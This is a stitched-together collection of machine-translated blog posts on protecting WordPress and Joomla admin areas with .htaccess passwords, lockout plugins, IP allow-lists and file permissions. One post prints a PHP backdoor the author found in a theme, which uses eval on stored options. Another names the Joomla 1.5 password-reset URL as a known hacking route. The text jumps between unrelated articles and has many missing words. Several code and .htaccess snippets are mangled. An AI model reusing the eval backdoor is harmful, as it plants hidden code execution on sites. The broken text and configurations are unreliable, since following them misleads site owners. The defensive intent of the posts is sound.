How to secure your WordPress admin login? Primitive measures and WPS Hide Login. Plugin to protect WordPress from hacking The WordPress admin panel is being attacked, what to do?

Hello, dear readers of the blog site. Today I want to talk about job security and some methods of protecting a website from hacking. Unfortunately, I am not an expert in this area and my knowledge does not go beyond the scope of the article about, but I will simply describe my recent experience. I didn’t use anything complicated, but I hope that it will increase the security of working with my sites.

It's about double authentication to log into the engine admin panel your website (should work on any CMS, but personally I only tested it on WordPress and Joomla). Protection is installed at the server level, so all attempts to guess the password for the admin panel (brute force) will not create an increased load on the hosting and it is quite difficult to bypass it. It is easy to install (literally in a few steps) and of all the knowledge it requires only attentiveness and the ability to access the site via FTP.

Well, I’ll also give a couple of actions that I applied to sites on already obsolete Joomla 1.5 engines, which it makes no sense for me to transfer to, but which constantly break my server and use the server to send spam. I performed the described actions recently, so I cannot state that the sites have stopped being infected with viruses, but I hope so. In general, I tried a little increase the crack resistance of Joomla 1.5.

How to protect Joomla 1.5 from hacking and viruses

As I mentioned above, the problem is that two of my sites that run Joomla 1.5 are constantly being hacked. We can consider them abandoned, because I don’t add new materials to them, but they regularly generate income (from posting articles from Miralinks and Webartex, as well as links from Gogetlinks). In general, it’s a pity to throw them away and transfer them to a new version of the engine “for scrap” (a pity for wasted time and effort).

All that remains is to either constantly monitor the load on the server and, when it increases, look for shells and other malware among the engine files, or somehow strengthen the protection. To search for malware, I download the engine files to my computer and scan them with DoctorWeb and Aibolit. The former does not find everything, and the latter sees the enemy too often where there is none, but I don’t know of any other effective methods. Although, there are also dozens of programs, but this is more convenient for everyone.

By the way, the script Aibolit can work not only on the server, but also directly on the computer in the folder with downloaded engine files (just don’t forget to disable the standard antivirus when downloading the site, because it may delete some of the files, but they will still remain on the server).

Detailed instructions are given in the video below, but in short, you download the PHP language interpreter from the Microsoft website and install it. After which you open the Aibolit script file called ai-bolit.php using this very interpreter:

The scanning speed depends on the speed of your computer and the number of files in your website engine. It took me several hours for the https://site, because Aibolit suspects even pictures of hiding viruses, and I have a ton of these same pictures, and the cache files take a lot of time when scanning. For sites on Joomla 1.5, the verification was much faster.

I decided to spend a day looking for ways to improve website security. We managed to do very little, but still better than nothing. Let's start with strengthening the protection (and reducing vulnerabilities) of two sites on Joomla 1.5. The following was done:

How else to protect Joomla 1.5 from viruses and streaming hacks

1. Also, “experts” claim that sites on Joomla 1.5 are broken “one or two times” by using the one available in the engine (supposedly you can change the admin password through it). Even if you don’t use registration on your website and don’t display a recovery link anywhere, this does not mean that you have covered this vulnerability. Just add the following snippet to the URL of your site's home page and get the feature you're looking for: /index.php?option=com_user&view=reset

   Actually, to close this loophole (but I still don’t understand how to use it for hacking), you can simply delete the following file:

   /components/com_user/models/reset.php True, after this, none of the users registered on your site will be able to use the password recovery function, but for me this was not important, because registration was not provided.

2. They also say that such a useful trick, like adding to the page address, also allows virus writers and hunters of other people’s property to get to some sensitive areas of your site and make it destructive, or in some other way over abuse him. This thing is again removed by editing one of the engine files. /libraries/Joomla/application/module/helper.php

   There you need to remove two pieces of code, or comment them out, enclosing them in /* and */ (this code will not be executed by the language interpreter). The first fragment is like this:

   If(count($result) == 0) ( if(JRequest::getBool("tp")) ( $result = JModuleHelper::getModule("mod_".$position); $result->title = $position; $result->content = $position; $result->position = $position;

   And the second one is like this:

   If(JRequest::getBool("tp")) ( $attribs["style"] .= " outline"; )

   Actually, after this you reset the cache and try to view the positions of the modules in your template using this construction:

   Https://site/?tp=1

   If it didn’t work out, then hopefully you have closed this hole.

3. Very often sites are hacked not from the outside, but from the inside. Trojans and keygens on your computer know what and where to look, so do not store passwords in FTP clients(there is an option to use for this purpose). It is considered even cooler to disable the ability to access your site via FTP, and instead, where the transmitted information (including passwords) is encrypted, which makes intercepting it useless. To be honest, I neglect the last advice because of my “darkness”. There is also the option of setting up access to your site via regular FTP only from a specific IP address (your computer), but my Internet provider has a dynamic IP (changes within a certain range).
4. Also advise engine not higher than those actually required for its operation. In fact, without really thinking about it, I set it according to the template: 755 for folders and 644 for files. You can do everything using the same Filezilla. Moreover, these rights must be applied not only to the directories of the root folder, but also to all directories and files that lie inside them.

   

   I set the permissions to 444 for the files in the root folder, and 705 for the tmp and logs directories. Of course, I could have clamped it more tightly, but I don’t have much experience in this, and there was no time to waste time on experiments. And besides, all this will not seriously deter hackers, because there are things that can nullify all our efforts. To do this, use commands like this:

   Therefore, in order to completely “concrete” the files of the Joomla 1.5 engine from hacking and encroachment, it is necessary to prohibit changing access rights to files and folders via PHP. This is done in the server settings, but I don’t know how and where yet. If you know, please post a link.

5. All of the above is designed to reduce the likelihood of your site being hacked and being penetrated by shells and other malware. However, the precautions taken are not a guarantee, so it would be great on the server (where your Joomla 1.5 site lives). This will remove all the negativity from the leaked evil. However, personally, again, I have not yet implemented this for reasons of my “darkness”. I would be grateful for links to materials explaining this process.

Very often, websites are broken after gaining access to the administrative panel. It is clear that it is password protected, so using brute force (smart selection) many, even seemingly complex passwords are broken in one or two. That's why the admin panel also needs to be protected, and it’s better to do this not using additional extensions, but using server tools. There are several protection options. For example, you can change the URL of the admin panel in one way or another so that a hacker cannot start his dirty business.

Another method of protection, which will be described in detail below, is to create an additional barrier in the path of an attacker (a living person or a script). It consists of password-protecting the directory with admin files (in Joomla this is the administrator folder, and in WordPress - wp-admin) using the web server. It turns out that when accessing the admin panel, you will first need to enter the login and password to access the folder, and only then the login and password to access, in fact, the admin panel of the engine. Moreover, by breaking the first line of defense using brute force methods, the malware will not create any significant additional load on the server, which is good.

6. Another very important, in my opinion, note for increasing the security of your sites from hacking and virus infection is to follow the rule: one site - one hosting account. Yes, it's more expensive, but much safer. When hosted on one account, all your sites will be immediately accessible via FTP if the malware gains access to only one of them. They break sites automatically, and it would not be reasonable to hope that the scripts will not go up the directory tree. In addition, it is very difficult to treat a bunch of sites on one hosting account, because by working on one site you lose sight of the already cured one, which is being infected at the same time.
7. By the way, they can break not only from your own site, but also from the site of your hosting neighbor, if the owners have not taken proper care to exclude this possibility. The hosting panel (such as) can also be hacked, but in any case, the number of hacks due to the fault of the hoster is negligible compared to the number of hacks due to the carelessness of site owners.

How to protect the admin area of ​​your website from hacking?

I want to talk in detail about the protection method that I recently used myself. It consists in prohibiting access to folders where the site’s administrative panel files are located. The ban is set using a wonderful .htaccess file, which, in essence, allows you to remotely control the settings of the web server on which your site is installed. At the same time, he knows how to do this selectively.

All directives written in .htaccess will only apply to the directory in which it is located. Do you want to change something in the settings for the entire site? Then place .htaccess in the root folder. Well, we are only interested in the settings regarding the folder with the admin files, so we will place it there. In Joomla this will be the administrator folder, in WordPress - wp-admin.

However, we can’t get by with .htaccess alone. You will also have to use .htpasswd, where the login and password for accessing this very administrative folder will be stored. Moreover, the password will not be stored in clear text, but as an MD5 cipher. It will not be possible to recover the password using it, but when you enter the correct combination in the password field, the web server will calculate the MD5 amount for this combination and compare it with what is stored in .htpasswd. If the data matches, then you will be allowed into the Joomla or WordPress admin area, but if not, then you will not be allowed.

That's all, all that remains is to bring the plan to life. You need to add some directives to .htaccess. Do you know which ones? I don't know. And somehow you will need to convert the password into an MD5 sequence. Problem. However, it has a fairly simple solution. Good people have organized an online service for generating content for the .htaccess file and the .htpasswd file based on the username and password you created. True, you will also have to specify the absolute path to the administrative folder, but this is trivial.

So, meet the great and terrible protection generator for the admin panel of your site. I see, right? You come up with, or best of all, create two complex combinations of letters, numbers and symbols on something, after which you enter them into the two top fields. Just don’t forget to write them down or put them in a password manager, otherwise you won’t be able to log into the admin area and will have to start doing everything described in this part all over again.

Here, now. Do you know this one? Even if you don’t know, it doesn’t matter. Connect to the site via FTP, create a file in its root with any name (even with the following url_path.php) and add this simple code to it:

"; echo "Full path to the script and its name: ".$_SERVER["SCRIPT_FILENAME"]."
"; echo "Script name: ".$_SERVER["SCRIPT_NAME"]; ?>

Then go to the browser and enter this URL into the address bar (with your domain, of course):

Https://site/url_path.php

As a result, you will see the absolute path you were interested in. Enter it in the above .htaccess and .htpasswd file generator. Don't forget to add the name of the administrator or wp-admin folder at the end of this path without the trailing slash. That’s it, now click on the “Generate” button

And one by one, transfer the contents for the .htaccess and .htpasswd files directly to these same files.

I hope that you have already created them in the administrator or wp-admin folders (depending on the engine you use)?

Well, now try to log into the admin panel. A window appears asking you to enter the username and password for your web server? It is rendered differently in different browsers, but in Chrome it looks like this:

If something doesn’t work, then “smoke” the absolute path to .htpasswd, written in the .htaccess file. In this case, just manually correct it when editing the file. That's all I wanted to tell you today. If you want to criticize or add something, then go ahead.

Virus in WordPress?

After writing this article, I discovered malware on my blog (https://site) (or something that was installed bypassing my will). I just wanted to change something in the code and went into . At the very bottom, immediately before the Body tag, I was struck by a call to some function unfamiliar to me (based on its name, but I didn’t find anything useful):

The name seems to be sane. It is noteworthy that about three weeks before, I accidentally discovered that I had a new table in the databases of two of my WordPress blogs (https://site and another one). Its name was simply wonderful - wp-config. Googling this name again did not yield anything useful, because all the answers were related to the wp-config.php file of the same name.

This table quickly grew in size (up to a hundred megabytes on https://site) and the addresses of pages of my site with various parameters were written into it. Not understanding the essence of this process, I simply demolished this table and that’s it. By the way, I have another blog on WordPress, but nothing like this was observed there.

Well, here I found such a “talking” insertion into the topic. I decided to see if anything consistent with the line described above at the bottom of the footer had been added there. It turned out that it was added. And so neatly - neither at the very top, nor at the very bottom, but the second (or third) function inscribed from the top:

Function wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));

This is where the wonderful “eval” catches your eye. What’s noteworthy is that Aibolit (described above) found this fragment suspicious, but I haven’t gotten around to it yet, because this script already suspects many people of unreliability. I also googled about this code and found a post (unfortunately, that domain was now blocked for non-payment) describing a similar problem. A friend of mine leaked this crap with a new theme into which some installation code was embedded.

I have had topics on both infected blogs for many years. There must have been some kind of vulnerability in the engine or , which was quickly (on stream) exploited by ill-wishers. In general, check yourself for the absence of such inclusions. The date of modification of the described files was, in my opinion, in mid-September of this year.

I also advise you to look at a selection from 17 video lessons on securing websites on Joomla. They will be played one after another automatically, and if you want, you can switch to the next lesson using the corresponding button on the player panel or select the desired lesson from the drop-down menu in the upper left corner of the player window:

Enjoy watching!

Good luck to you! See you soon on the pages of the blog site

You might be interested

The Joomla site began to produce a bunch of errors like - Strict Standards: Non-static method JLoader::import () should not be called statically in
Updating Joomla to the latest version
Creating a map for a Joomla site using the Xmap component
What is Joomla
User groups in Joomla, caching settings and the problem of sending mail from the site
K2 component for creating blogs, catalogs and portals on Joomla - features, installation and Russification
Modules in Joomla - viewing position, setting and output, as well as assigning class suffixes
How to update a static Html site to a dynamic one on Joomla
Installing WordPress in details and pictures, logging into the WP admin area and changing the password
Joomla plugins - TinyMCE, Load Module, Legacy and others installed by default

WordPress is a very popular CMS, this is undoubtedly its advantage, there are many plugins for any task, but this is also its weakness, because the more popular the CMS for a site, the more attacks there are on it, or rather it is more interesting for an attacker, since having found a vulnerability In WordPress, hundreds of thousands of sites become available to attackers, so protecting your WordPress site requires special attention.

Why do WordPress sites get hacked?

All popular CMS (website engines) are hacked, and WordPress is no exception, I hack mainly using so-called programs (scripts) - exploits, to gain control over the site, this is done mainly to create links from your site to other resources, and to create a BotNet that carries out DDoS attacks on other servers, while the site remains in working order, and you will never see with the naked eye that it is infected. In any case, the hack will have a bad effect on your site, and you may even disappear from the search results.

As I already said, hacking occurs automatically, identifying the CMS of a site is not difficult, there are many online services for this, often an attacking program tries to guess the password from the administrative part of the site, i.e. goes to the address your-site.ru/wp-admin and tries to guess the password for your user, finding out the username is not difficult, you write articles under it, so the login will be visible to bots, they know where to look for it. unless, of course, you closed it using a plugin, one of which we will talk about below. The password for the site administrator should be very complex, but even if this condition is met, you cannot let bots try (brute force) the password for the “admin”, because this is not a necessary load on the server, imagine if several dozen bots from different parts of the world are doing this.

Plugin to protect WordPress from attacks

Let’s move straight to the plugin, there are several worth considering, let’s talk about a simpler and more understandable one, I use it on many of my projects, for clients, it copes very well with the assigned tasks of protecting the site -

This plugin is quite easy to learn, and is 90% Russified, it is installed like any plugin from the WordPress repository, after installation you need to activate it and make basic settings. It appears in the main menu in the WordPress admin area

WP Security Plugin Control Panel

After going to the plugin settings, we get to the control panel. Here you can make basic important settings.

1. Shows the last 5 authorizations in your admin panel, the user and IP address are specified, for example, I immediately see my IPs, there are only two of them, so I have no doubt that someone else knows my password from the administrative part.
2. The section of the most important functions, here you need to include everything and agree with everything.
3. The plugin is capable of tracking file changes on the hosting, and it can send a report to you by email, and you are always aware of what files have changed, this is very useful, if you have been downloaded some kind of script or any file with malicious code, you will immediately see it in the report, the only negative is that after updating any other plugins you have installed or the WordPress engine itself, WP Security will see all these changes and send you a huge list, but you can get used to these reports, because you know when you updated the files yourself.
4. This item changes the standard address of the site admin panel yoursite.ru/wp-admin, to yoursite.ru/luboe-slovo, this will save your admin panel from some would-be hackers and bots, but unfortunately not from all of them, especially advanced ones still find it, I can judge this by looking at the “Authorizations” section, but more on that later.
5. This item should be turned off, as in the screenshot, it is only needed when you want to put the site on maintenance, visitors will be given a sign with a message that the site is undergoing technical work, sometimes this is useful, for example, when changing the design of the site, or in case of some global changes, do not forget that in this mode search robots also cannot view your site, do not close it for a long time.

Protecting the WordPress admin area from password guessing

Now let's go to the menu item - Authorization, in my opinion, a very useful item, and it’s worth setting it up, as it is on one of my sites. with an attendance of about 1000 people, the plugin catches dozens of attempts a day to guess the password to the admin panel, and adds the IP addresses of hackers to the blacklist, i.e. blocks it completely, the site stops responding to this IP address, thereby nullifying attempts to find a password, the settings I make on the screen.

1. I leave the number of attempts to “make a mistake” at -3, don’t do less, you may enter the password incorrectly yourself and end up blacklisted with your IP, you’ll have to
2. This is the time after which the counter of incorrect login attempts is reset.
3. I set the blocking period for IP addresses from which incorrect authorization attempts were made longer, in minutes, i.e. bath for a long time, the screenshot shows 6,000,000 minutes, that’s about 11 years, I think that’s enough

All blocked IPs will be denied access not only to the admin panel, but to the entire site, keep this in mind

List of blocked IP addresses

1. attacker's IP address
2. the login for which the password was selected, by the way, is correct
3. date when the automatic blocking was made

White list of addresses for the admin panel

To allow access to the administrative part of a WordPress site only from certain IP addresses, you can activate the white list of addresses in the plugin settings.

1. activating this option
2. here is your current IP address
3. in this field enter all IP addresses from which access to the admin panel is allowed

If you need to specify a range of IP addresses, then instead of a number, use an asterisk, for example 192.168.5.* - this design will give access to the WordPress admin panel from all IPs starting with these numbers, this method can be useful for those who do not have a dedicated IP address , and it is constantly changing, for example, when working with mobile Internet, as a rule, the range will remain within the first two digits, like this, for example 192.168.*.*

Hello everyone in this tutorial. And in truth, it will be short but useful, especially for beginners. Do you guys know the statistics on how many sites are hacked, no? But I can say that every fourth person has already been hacked, by the standards of what the authors of blogs and blogs know about this fact, but the figure may be much lower. Now we will protect the WordPress admin area, because this is the very first and strongest wall.

Preface.

As always, a little theory. You see what’s the matter, we are all people, and our behavior is the same, and until someone bites us in one place, we won’t bother, well, am I right? The thing is that the site is hacked by a program that operates according to its own algorithms, and if your site gives way to these algorithms, then good luck.

Securing your site is the very first thing that must be done, and this must always be done and checked. So, most administrators themselves make their job easier for hackers, as described here. Or they simply stole your passwords, for example from a program for FTP connection to your website.

Read all the articles in and protect yourself, and I also advise you to scroll through about viruses, it’s also very informative.

Authorization restriction plugin.

It is called Login LockDown, it is installed as standard, you can do it directly through the WordPress admin panel. Enter its name in the search and install it as in the screenshot below. He's the only one you can't miss.

Now it needs to be configured, in principle there are not many settings, but most articles on the Internet are reviewed on older versions of this plugin, where they suggest doing a lot of already useless things. Let's start with a screenshot and a description below it (I divided it into two parts for convenience)

1. Path to plugin settings.
2. Max Login Retrieves, this means the number of attempts that a person can enter, I set 3 as the optimal option. If during these three attempts it was not correct, then access to the input is blocked.
3. Lockout Length (minutes), based on the previous point, we indicate exactly how long we will block the data, between attempts to enter data, I set it to 1 minute. That is, suppose you log into the admin panel, but were unable to do so the first time, then the WordPress admin protection will be activated immediately, and you will be able to continue only after the time specified here.
4. Lockout Length (minutes), after several failures (I have three set), the plugin sees that all attempts to make authorization are useless, and blocks the user’s IP, here we register for what time, I have an hour.
5. Lockout Invalid Usernames? Count the number of attempts when entering an incorrect login, a required item.

1. Mask Login Errors? We also put yes, definitely. It's all about WordPress itself; it itself tells you that either the login or password was entered incorrectly. And to hide these clues, such a point is needed.
2. Show Credit Link? By default, if this item is not checked, it will say that everything is protected by the Login LockDown plugin. In order not to give unnecessary information, we make this setting. In old articles on the Internet, they advised to get into the plugin code and do everything by hand, but time passes and this function was implemented by the developers themselves.
3. Once everything is done, click on this button and save the settings.
4. Currently Locked Out. And here there will be a list of all the IP addresses that tried to hack the site, or rather, those whose entry limit was exceeded.

Conclusion.

Come on, don’t think of a blog as a stationary robot that you came to, wrote, optimized something and that’s it. Remember my word

WordPress is one of the most popular CMS in the world. More than 18.9% of all Internet sites work on it, and the number of installations has exceeded 76.5 million. Unfortunately, such popularity has its downsides. According to a report from Securi, a company that specializes in website security, WordPress is the most hacked CMS in the world. However, if you follow best practices on this matter and implement a few of the techniques in our guide, you will realize that WordPress security can be easily strengthened with a few simple steps.

Before we start this guide, please make sure you have the following:

• Accessing the WordPress Dashboard
• Access to your hosting account (optional)

Step 1 – Keeping WordPress Up to Date

This will be the first and most important step to improve WordPress security. If you want a clean, bloatware-free site, you need to make sure your WordPress version is up to date. This may seem like a simple tip, but only 22% of all WordPress installations are the latest version.

WordPress implemented an automatic update feature in version 3.7, but it only works for minor security updates. Whereas large, key updates must be installed manually.

In case you don't know how to update WordPress, take a look here.

Step 2 – Using non-standard login credentials

Are you using admin as your WordPress admin username? If your answer is yes, then you are seriously weakening your WordPress security and making it easier for hackers to break into your control panel. It is strongly recommended that you change your admin username to something else (see this guide if you're not sure how to do this) or create a new admin account with different credentials. Follow these steps if you prefer the second option:

A good password plays a key role in WordPress security. It is much more difficult to crack a password consisting of numbers, lower and upper case letters and special characters. Tools like LastPass and 1Password can help you create and manage complex passwords. Additionally, if you ever need to log into your WordPress dashboard while connected to an unsecured network (such as coffee shops, public libraries, etc.), be sure to use a secure VPN that will protect your login information.

Step 3 – Enable Two-Step Verification

Two-Step Verification adds an extra layer of security to your login page. After confirming the username, it adds another step that must be completed for successful authorization. Most likely, you already use this to access mail, online banking and other accounts containing sensitive information. Why not use this in WordPress too?

Although it may seem complicated, enabling two-step verification in WordPress is very easy. All you need to do is install the 2-Step Verification mobile app and set it up for your WordPress. You can find more detailed information on how to enable two-step verification on WordPress.

Step 4 –Disable PHP error reporting

PHP error reports can be quite useful if you are developing a website and want to make sure everything is working correctly. However, showing errors to everyone is a serious security flaw in WordPress.

You must fix this as quickly as possible. Don't be alarmed, you don't have to be a programmer to disable PHP error reporting on WordPress. Most hosting providers provide this option in their control panel. If not, then just add the following lines to your file wp-config.php. You can use or to edit the file wp-config.php.

Error_reporting(0); @ini_set('display_errors', 0);

That's it. Error reporting is disabled.

Step 5 – Don't use nulled templates for WordPress

Remember “Free cheese only comes in a mousetrap.” The same applies to nulled templates and plugins.

There are thousands of nulled plugins and templates all over the Internet. Users can download them for free using various file hosting services or torrent files. They don't know that most of them are infected with malware or black hat SEO links.

Stop using nulled plugins and templates. Not only is this unethical, but it also harms your WordPress security. You will end up paying more to the developer to clean up your site.

Step 6 –Scan WordPress for malware

To infect WordPress, hackers often use holes in templates or plugins. Therefore, it is important to check your blog frequently. There are many well-written plugins for this purpose. WordFence stands out from this crowd. It offers application guidance and automatic testing capabilities, along with a bunch of other miscellaneous settings. You can even restore modified/infected files in a couple of clicks. It is distributed free of charge. These facts should be enough for you to install it right now.

Other popular plugins to enhance WordPress security:

• BulletProof Security – Unlike WordFence, which we talked about earlier, BulletProof does not scan your files, but it does provide you with a firewall, database protection, etc. A distinctive feature is the ability to configure and install the plugin in a few mouse clicks.
• Sucuri Security – This plugin will protect you from DDOS attacks, contains a blacklist, scans your site for malware and manages your firewall. When something is discovered. you will be notified via email. Google, Norton, McAfee - this plugin includes all the blacklists from these programs. You can find a complete guide about installing plugins for a WordPress site.

Step 7 – Transfer the site to a more secure hosting

This advice may seem strange, but statistics show that more than 40% of WordPress sites have been hacked due to security holes in their hosting account. These statistics should encourage you to move WordPress to a more secure hosting. Some key facts to keep in mind when choosing a new hosting:

• If it is shared hosting, make sure that your account is isolated from other users and there is no risk of infection from other sites on the server.
• The hosting has an automatic backup function.
• The server has a third-party firewall and scanning tool.

Step 8 – Back up your data as often as possible

Even the biggest websites get hacked every day, despite the fact that their owners spend thousands on improving WordPress security.

If you follow best practices on this matter and have applied the tips in this article, you will still need to back up your site regularly.

There are several ways to create a backup. For example, you can manually download the site files and export the database, or use the tools offered by your hosting company. Another way is to use WordPress plugins. The most popular of them:

You can even automate the process of creating and storing WordPress backups in Dropbox.

Step 9 – Turning Off File Editing

As you probably know, WordPress has a built-in editor that allows you to edit PHP files. This feature is as useful as it can be harmful. If hackers gain access to your control panel, the first thing they will notice is: File Editor. Some WordPress users prefer to turn this feature off completely. It can be turned off by editing the file wp-config.php, by adding the following code there:

Define("DISALLOW_FILE_EDIT", true);

That's all you need to disable this feature in WordPress.

IMPORTANT! In case you want to re-enable this feature, use FTP client or File manager your hosting and remove this code from the file wp-config.php.

Step 10 – Removing Unused Templates and Plugins

Clean up your WordPress site and remove all unused templates and plugins. Hackers often use disabled and outdated templates and plugins (even official WordPress plugins) to gain access to your control panel, or upload malicious content to your server. By removing plugins and templates that you stopped using (and perhaps forgot to update) a long time ago, you reduce risks and make your WordPress site more secure.

Step 11 – Using .htaccess to Improve WordPress Security

Htaccess is a file necessary for WordPress links to work correctly. Without the correct entries in the .htaccess file, you will receive a lot of 404 errors.

Not many users know that .htaccess can be used to improve WordPress security. For example, you can block access or disable PHP execution in certain folders. Below are examples of how you can use .htaccess to improve the security of your WordPress site.

IMPORTANT! Before you make changes to the file, make a backup of your old .htaccess file. For this you can use or .

Denying access to the WordPress admin area

The code below will allow you to access the WordPress admin area only from certain IPs.

AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "WordPress Admin Access Control" AuthType Basic order deny,allow deny from all allow from xx.xx.xx.xxx allow from xx.xx.xx.xxx

Note that you need to change XX.XX.XX.XXX to your IP address. You can use this site to check your current IP. If you use more than one connection to manage your WordPress site, then make sure to write down different IP addresses (add as many addresses as you need). It is not recommended to use this code if you have a dynamic IP address.

Disable PHP execution in certain folders

Hackers love to upload backdoor scripts to the WordPress downloads folder. By default, this folder is used only for storing media files. Therefore, it should not contain any PHP files. You can easily disable PHP execution by creating a new .htaccess file in /wp-content/uploads/ with these rules:

deny from all

Protecting the wp-config.php file

The wp-config.php file contains the core WordPress settings and MySQL database details. Hence, it is the most important file in WordPress. Therefore, it most often becomes the main target of WordPress hackers. However, you can easily secure it using the following rules in .htaccess:

order allow, deny deny from all

Step 12 – Changing Default WordPress Database Prefixes to Prevent SQL Injection

The WordPress database contains and stores all the key information necessary for the operation of your website. As a result, it becomes another target for hackers and spammers who execute automated code to carry out SQL injection. When installing WordPress, many people don't bother changing the default database prefix wp_. According to WordFence, 1 in 5 WordPress hacks involve SQL injection. Because wp_ This is one of the standard values, and hackers first start with it. At this point, we will briefly look at how to protect a WordPress site from this type of attack.

Changing the prefix table for an existing WordPress site

Part One – Changing the prefix in wp-config.php

Find your file wp-config.php using or find the line with the value $table_prefix.

You can add additional numbers, letters, or underscores. After that, save your changes and move on to the next step. In this tutorial, we are using wp_1secure1_ as the new table prefix.

While you are in your file wp-config.php, also find the name of your database so you know which one to change. Look in the section define('DB_NAME'.

Part Two - Updating All Database Tables

Now you need to update all the records in your database. This can be done using phpMyAdmin.

Find the database defined in the first part and log into it.

By default, a WordPress installation has 12 tables and each one needs to be updated. However, this can be done faster by using the SQL section of phpMyAdmin.

Changing each table manually would take a huge amount of time, so we use SQL queries to speed up the process. Use the following syntax to update all tables in your database:

RENAME table `wp_commentmeta` TO `wp_1secure1_commentmeta`; RENAME table `wp_comments` TO `wp_1secure1_comments`; RENAME table `wp_links` TO `wp_1secure1_links`; RENAME table `wp_options` TO `wp_1secure1_options`; RENAME table `wp_postmeta` TO `wp_1secure1_postmeta`; RENAME table `wp_posts` TO `wp_1secure1_posts`; RENAME table `wp_terms` TO `wp_1secure1_terms`; RENAME table `wp_termmeta` TO `wp_1secure1_termmeta`; RENAME table `wp_term_relationships` TO `wp_1secure1_term_relationships`; RENAME table `wp_term_taxonomy` TO `wp_1secure1_term_taxonomy`; RENAME table `wp_usermeta` TO `wp_1secure1_usermeta`; RENAME table `wp_users` TO `wp_1secure1_users`;

Some WordPress templates or plugins can add additional tables to the database. In case you have more than 12 tables in the MySQL database, add the remaining ones manually in the SQL query and execute it.

Part Three - Checking Options and Custom Metadata Tables

Depending on the number of plugins you have installed, some values ​​in your database will need to be updated manually. This can be done by running separate SQL queries on the table options And metadata.

For table options, you should use:

SELECT * FROM `wp_1secure1_options` WHERE `option_name` LIKE `%wp_%`

For table metadata, you should use:

SELECT * FROM `wp_1secure1_usermeta` WHERE `meta_key` LIKE `%wp_%`

When you get the query results, just update all the values ​​with wp_ to your new configured prefix. In the table user metadata you need to edit the field meta_key, whereas for options, you need to change the value option_name.

Securing New WordPress Installs

If you plan to install new WordPress sites, you do not need to go through this process again. You can easily change WordPress table prefixes during the installation process:

Congratulations! You have successfully improved your database's security against SQL injection.

Conclusion

Even though WordPress is the most hacked CMS in the world, improving its security is not that difficult. In this guide, we've shared 12 tips you should follow to keep your WordPress security up to par.

Author

Elena has a professional technical education in the field of information technology and experience in programming in different languages ​​for different platforms and systems. She has devoted more than 10 years to the web industry, working with various CMSs, such as Drupal, Joomla, Magento and, of course, the most popular content management system these days – WordPress. Her articles are always technically verified and accurate, be it a review for WordPress or instructions for setting up your VPS server.

Reading time: 4 min

Just a year ago, my server load very often exceeded the limit allowed by the tariff. Moreover, the problem was not in the sites themselves, but in a banal attack by attackers on the admin panel in order to gain access for some of their own purposes.

Today I will tell you how I dealt with the problem, which I advise you to do at home, just in case.

As a result, it was decided to change the address of the login form in the admin panel, as well as close the admin panel for all strangers who do not have my IP.

It is worth noting that some hosting companies themselves automatically created a new admin address for all users. If you use the services of such hosting services, then do not read further articles and do not waste time.

How to change WordPress admin address

I previously published such an article. There seems to be a similar result here, but the effect and purpose are different.

Don't forget to make backup copies of the files you work with.

• First, copy the wp-login.php file from the root of the site (where wp-config.php is located) via ftp to your computer.
• Rename it as you please. For example vhod.php
• Open this file with the free Notepad++ program (or whatever is more convenient for you to edit) and replace all occurrences of the phrase wp-login.php with vhod.php .

You can quickly do this by pressing CTRL+F in Notepad++. Well, in the window that appears, enter:

So in a second I replaced the occurrence of the phrase I needed in the entire file. It came across 12 times.

We upload the new file to ftp.

A similar thing will need to be done in the general-template.php file, which you will find in the wp-includes folder right there on ftp. Those. change the occurrence of the phrase wp-login.php to vhod.php , but do not change the file name itself!

Now you have a .htaccess file there in the root of the site. We also copy it to our computer and open it for editing (you can use a regular Windows Notepad). We insert a piece of code that blocks everyone’s access to the wp-login.php file

Order Deny,Allow Deny from all

< Files wp - login . php > Order Deny, Allow Deny from all < / Files >

It was this step that relieved the burden and also hid the authorization form. The load was relieved by inserting the presented code into .htaccess: if there was a call to http://site.ru/wp-login.php, it would give a 403 error, not a 404.

Let us briefly repeat the operating algorithm:

• Rename the wp-login.php file to an arbitrary name and replace the occurrences of the name with a new one.
• Similarly, in the general-template.php file, we replace the old name wp-login.php with the new one.
• We register in the .htaccess file a ban on access to wp-login.php for everyone

After updating WordPress, all that remains to be corrected is the general-template.php file. But because The engine is not updated very often - this is a small thing compared to the effect.

We set a restriction on logging in via IP via .htaccess

As additional measures to protect the site, I adopted a restriction on logging into the admin panel via IP. The problem was solved very simply: create an empty .htaccess file and add the following code to it

order deny,allow allow from 192.168.0.1 deny from all

order deny, allow allow from 192.168.0.1 deny from all

We save the file and drop it into the wp-admin folder in the same place at the root of the site.

Instead of my IP from the example, put your real one. Moreover, you can add several IPs with a new line each:

order deny,allow allow from 126.142.40.16 allow from 195.234.69.6 deny from all

order deny, allow allow from 126.142.40.16 allow from 195.234.69.6 deny from all

If the IP is dynamic, then you can put numbers only up to the first, second or third dot: